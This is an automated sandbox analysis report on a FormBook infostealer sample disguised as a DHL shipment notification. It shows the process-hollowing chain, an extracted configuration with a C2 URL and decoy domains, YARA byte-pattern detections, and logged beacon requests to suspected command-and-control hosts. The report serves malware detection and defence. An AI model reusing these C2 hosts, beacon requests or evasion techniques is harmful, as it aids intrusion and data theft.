Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHL SHIPMENT NOTIFICATION 1146789443.exe

Overview

General Information

Sample Name:DHL SHIPMENT NOTIFICATION 1146789443.exe
Analysis ID:626119
MD5:8fbdf9f70b21179d87b83fe47b2137dd
SHA1:146eebe16adad9486cac66f4574810cec1f56cbb
SHA256:972bc525f6be5f7281a72ec4887cc5b85f4b064463bba234f1258c967b164026
Tags:exeFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • DHL SHIPMENT NOTIFICATION 1146789443.exe (PID: 6224 cmdline: "C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe" MD5: 8FBDF9F70B21179D87B83FE47B2137DD)
    • aeokw.exe (PID: 6272 cmdline: C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok MD5: 6F70881E0183CE9F78E300CF2C8DC48E)
      • aeokw.exe (PID: 6288 cmdline: C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok MD5: 6F70881E0183CE9F78E300CF2C8DC48E)
        • explorer.exe (PID: 3616 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • svchost.exe (PID: 2360 cmdline: C:\Windows\SysWOW64\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
            • cmd.exe (PID: 6308 cmdline: /c del "C:\Users\user\AppData\Local\Temp\aeokw.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 1524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.lgf7.com/amdf/"], "decoy": ["xadazheng.com", "bremorgan.com", "keilaniclothing.com", "du9a20ofolvhfr.xyz", "santamariacourt.com", "wcagls.com", "visionuptechnology.com", "sddysrq.com", "pencetslot.site", "wpcoisas.com", "caomei08.xyz", "infinitepotential.xyz", "anotherchanceranch.net", "ymterp.com", "zhuyunming.com", "elementarymodel.com", "edmondsonfinancial.com", "adsnethosting.com", "obohsan-souzokusindan.tech", "helicopterart.com", "shangnuanjia.com", "89660.world", "zkzxconsulting.com", "temp-bait.com", "8562.pet", "taojinwa.net", "chatterboxtwo.com", "pejoki.com", "effectual-science.com", "ma3721.com", "b498gszj.com", "sicuumon.com", "northwtb.com", "reconbattery.xyz", "sibirerzucht.com", "fusionpsychiatry.net", "biblicalguidance.net", "liquated99tic.com", "ruvinslimshop.com", "attjeans.com", "reservedadseyelevel.com", "theselungs.com", "safe-edd-centerhelp92.com", "provercoop.com", "216498.com", "bbqautopilot.com", "nurhurdacilik.com", "zo177.wales", "doublemsporthorses.com", "hl308.com", "movewhenyouwant.com", "smartinvestorsguide.com", "joga-wroclaw.com", "potionsparchment.com", "rtpholywin99.com", "sosocean.com", "vliralip.com", "alphaomegamerch.net", "pallettruckload.com", "spritzdao.xyz", "unbound-soul.com", "enssale.xyz", "capitalisllc.com", "ultrakill.xyz"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000000.294568326.000000000E814000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000005.00000000.294568326.000000000E814000.00000040.00000001.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x16a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x1191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x17a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x191f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x40c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x78e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x88ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000000.294568326.000000000E814000.00000040.00000001.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x4809:$sqlite3step: 68 34 1C 7B E1
    • 0x491c:$sqlite3step: 68 34 1C 7B E1
    • 0x4838:$sqlite3text: 68 38 2A 90 C5
    • 0x495d:$sqlite3text: 68 38 2A 90 C5
    • 0x484b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x4973:$sqlite3blob: 68 53 D8 7F 8C
    00000002.00000002.322163759.0000000000DD0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000002.00000002.322163759.0000000000DD0000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 28 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.0.aeokw.exe.400000.8.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.0.aeokw.exe.400000.8.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1aae7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1baea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.0.aeokw.exe.400000.8.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17a09:$sqlite3step: 68 34 1C 7B E1
        • 0x17b1c:$sqlite3step: 68 34 1C 7B E1
        • 0x17a38:$sqlite3text: 68 38 2A 90 C5
        • 0x17b5d:$sqlite3text: 68 38 2A 90 C5
        • 0x17a4b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17b73:$sqlite3blob: 68 53 D8 7F 8C
        1.2.aeokw.exe.12a0000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.aeokw.exe.12a0000.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 22 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          No Snort rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 00000002.00000002.322163759.0000000000DD0000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.lgf7.com/amdf/"], "decoy": ["xadazheng.com", "bremorgan.com", "keilaniclothing.com", "du9a20ofolvhfr.xyz", "santamariacourt.com", "wcagls.com", "visionuptechnology.com", "sddysrq.com", "pencetslot.site", "wpcoisas.com", "caomei08.xyz", "infinitepotential.xyz", "anotherchanceranch.net", "ymterp.com", "zhuyunming.com", "elementarymodel.com", "edmondsonfinancial.com", "adsnethosting.com", "obohsan-souzokusindan.tech", "helicopterart.com", "shangnuanjia.com", "89660.world", "zkzxconsulting.com", "temp-bait.com", "8562.pet", "taojinwa.net", "chatterboxtwo.com", "pejoki.com", "effectual-science.com", "ma3721.com", "b498gszj.com", "sicuumon.com", "northwtb.com", "reconbattery.xyz", "sibirerzucht.com", "fusionpsychiatry.net", "biblicalguidance.net", "liquated99tic.com", "ruvinslimshop.com", "attjeans.com", "reservedadseyelevel.com", "theselungs.com", "safe-edd-centerhelp92.com", "provercoop.com", "216498.com", "bbqautopilot.com", "nurhurdacilik.com", "zo177.wales", "doublemsporthorses.com", "hl308.com", "movewhenyouwant.com", "smartinvestorsguide.com", "joga-wroclaw.com", "potionsparchment.com", "rtpholywin99.com", "sosocean.com", "vliralip.com", "alphaomegamerch.net", "pallettruckload.com", "spritzdao.xyz", "unbound-soul.com", "enssale.xyz", "capitalisllc.com", "ultrakill.xyz"]}
          Multi AV Scanner detection for submitted file
          Source: DHL SHIPMENT NOTIFICATION 1146789443.exeVirustotal: Detection: 42%Perma Link
          Source: DHL SHIPMENT NOTIFICATION 1146789443.exeReversingLabs: Detection: 48%
          Yara detected FormBook
          Source: Yara matchFile source: 2.0.aeokw.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.aeokw.exe.12a0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.aeokw.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.aeokw.exe.12a0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.aeokw.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.aeokw.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.aeokw.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.aeokw.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.aeokw.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000000.294568326.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.322163759.0000000000DD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.322197992.0000000001100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.256268925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.310303298.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.513829968.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.513722693.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.258171974.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.254937698.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: http://www.rtpholywin99.com/amdf/?oTsXW=bHtTbh8HU&9rF=Trmpqgljk9XuX6wxdqqXIm/y+wmhK8tfRywx+ln+mTz4pafXVdYl+/2RwiFK/8XcMfBxAvira URL Cloud: Label: malware
          Source: www.lgf7.com/amdf/Avira URL Cloud: Label: malware
          Machine Learning detection for sample
          Source: DHL SHIPMENT NOTIFICATION 1146789443.exeJoe Sandbox ML: detected
          Source: 2.0.aeokw.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.aeokw.exe.12a0000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.0.aeokw.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.0.aeokw.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.2.aeokw.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: DHL SHIPMENT NOTIFICATION 1146789443.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: DHL SHIPMENT NOTIFICATION 1146789443.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: C:\mvbaz\xgpqcu\xwqn\f27888ddf02c4c6aa9eb1b8f5b3a0302\rlifld\nwoxnqyr\Release\nwoxnqyr.pdb source: DHL SHIPMENT NOTIFICATION 1146789443.exe, 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmp, aeokw.exe, 00000001.00000002.258082115.0000000000D7E000.00000002.00000001.01000000.00000004.sdmp, aeokw.exe, 00000001.00000000.249383523.0000000000D7E000.00000002.00000001.01000000.00000004.sdmp, aeokw.exe, 00000002.00000002.322132231.0000000000D7E000.00000002.00000001.01000000.00000004.sdmp, svchost.exe, 00000011.00000002.515611102.000000000352F000.00000004.10000000.00040000.00000000.sdmp, nsk2671.tmp.0.dr, aeokw.exe.0.dr
          Source: Binary string: wntdll.pdbUGP source: aeokw.exe, 00000001.00000003.255155254.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, aeokw.exe, 00000001.00000003.254132987.000000001ADE0000.00000004.00001000.00020000.00000000.sdmp, aeokw.exe, 00000002.00000003.260122291.00000000012DE000.00000004.00000800.00020000.00000000.sdmp, aeokw.exe, 00000002.00000002.322328355.0000000001470000.00000040.00000800.00020000.00000000.sdmp, aeokw.exe, 00000002.00000002.322514089.000000000158F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.322000917.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.323291458.0000000002E00000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: aeokw.exe, 00000001.00000003.255155254.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, aeokw.exe, 00000001.00000003.254132987.000000001ADE0000.00000004.00001000.00020000.00000000.sdmp, aeokw.exe, 00000002.00000003.260122291.00000000012DE000.00000004.00000800.00020000.00000000.sdmp, aeokw.exe, 00000002.00000002.322328355.0000000001470000.00000040.00000800.00020000.00000000.sdmp, aeokw.exe, 00000002.00000002.322514089.000000000158F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.322000917.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.323291458.0000000002E00000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: svchost.pdb source: aeokw.exe, 00000002.00000002.322286626.00000000011DA000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: aeokw.exe, 00000002.00000002.322286626.00000000011DA000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeCode function: 0_2_00405D7A CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D7A
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeCode function: 0_2_004069A4 FindFirstFileW,FindClose,0_2_004069A4
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 4x nop then pop ebx2_2_00407B1B
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 4x nop then pop edi2_2_0040E472
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then pop ebx17_2_02387B1B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then pop edi17_2_0238E472

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.ultrakill.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 3.64.163.50 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 142.250.185.115 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.rtpholywin99.com
          Source: C:\Windows\explorer.exeDomain query: www.keilaniclothing.com
          Performs DNS queries to domains with low reputation
          Source: C:\Windows\explorer.exeDNS query: www.ultrakill.xyz
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.lgf7.com/amdf/
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: global trafficHTTP traffic detected: GET /amdf/?oTsXW=bHtTbh8HU&9rF=Trmpqgljk9XuX6wxdqqXIm/y+wmhK8tfRywx+ln+mTz4pafXVdYl+/2RwiFK/8XcMfBx HTTP/1.1Host: www.rtpholywin99.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /amdf/?9rF=/oFEaKse3b+9bUwDmBZBOOdpMJRIltPBO/GIVMmFEKpLcaQ5ll8yuFZgv1Udvzfmdn1m&oTsXW=bHtTbh8HU HTTP/1.1Host: www.keilaniclothing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /amdf/?oTsXW=bHtTbh8HU&9rF=2pnwrPnaayjLTa+dMDr3ioSS0RS/WyH1Gjote8OZi1oxTz0HZpyyfRSy0TFJ31yfLnqh HTTP/1.1Host: www.ultrakill.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 23.227.38.74 23.227.38.74
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 13 May 2022 14:10:37 GMTX-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockServer: GSEAccept-Ranges: noneVary: Accept-EncodingTransfer-Encoding: chunkedConnection: closeData Raw: 62 31 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 42 6c 6f 67 67 65 72 20 69 73 20 61 20 62 6c 6f 67 20 70 75 62 6c 69 73 68 69 6e 67 20 74 6f 6f 6c 20 66 72 6f 6d 20 47 6f 6f 67 6c 65 20 66 6f 72 20 65 61 73 69 6c 79 20 73 68 61 72 69 6e 67 20 79 6f 75 72 20 74 68 6f 75 67 68 74 73 20 77 69 74 68 20 74 68 65 20 77 6f 72 6c 64 2e 20 42 6c 6f 67 67 65 72 20 6d 61 6b 65 73 20 69 74 20 73 69 6d 70 6c 65 20 74 6f 20 70 6f 73 74 20 74 65 78 74 2c 20 70 68 6f 74 6f 73 20 61 6e 64 20 76 69 64 65 6f 20 6f 6e 74 6f 20 79 6f 75 72 20 70 65 72 73 6f 6e 61 6c 20 6f 72 20 74 65 61 6d 20 62 6c 6f 67 2e 22 3e 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 62 6c 6f 67 67 65 72 2c 20 62 6c 6f 67 73 70 6f 74 2c 20 62 6c 6f 67 2c 20 62 6c 6f 67 67 65 72 2e 63 6f 6d 2c 20 62 6c 6f 67 73 70 6f 74 2e 63 6f 6d 2c 20 70 65 72 73 6f 6e 61 6c 20 62 6c 6f 67 2c 20 77 65 62 6c 6f 67 2c 20 63 72 65 61 74 65 20 62 6c 6f 67 2c 20 6e 65 77 20 62 6c 6f 67 22 3e 0a 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 6c 6f 67 67 65 72 2e 63 6f 6d 22 3e 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 23 68 6f 6d 65 42 75 74 74 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 32 37 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 6c 6f 67 67 65 72 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 76 31 2f 76 2d 63 73 73 2f 33 38 39 36 35 35 38 36 37 33 2d 6e 65 77 5f 75 69 5f 73 74 61 74 69 63 5f 70 61 67 65 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6c 61 6e 67 5f 65 6e 20 72 62 22 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 13 May 2022 14:10:57 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Sorting-Hat-PodId: 250X-Sorting-Hat-ShopId: 64045383931X-Dc: gcp-europe-west1X-Request-ID: c795f513-2a89-4e29-a885-b65e0c1175bdX-XSS-Protection: 1; mode=blockX-Download-Options: noopenX-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 70abfb06ecb2917d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 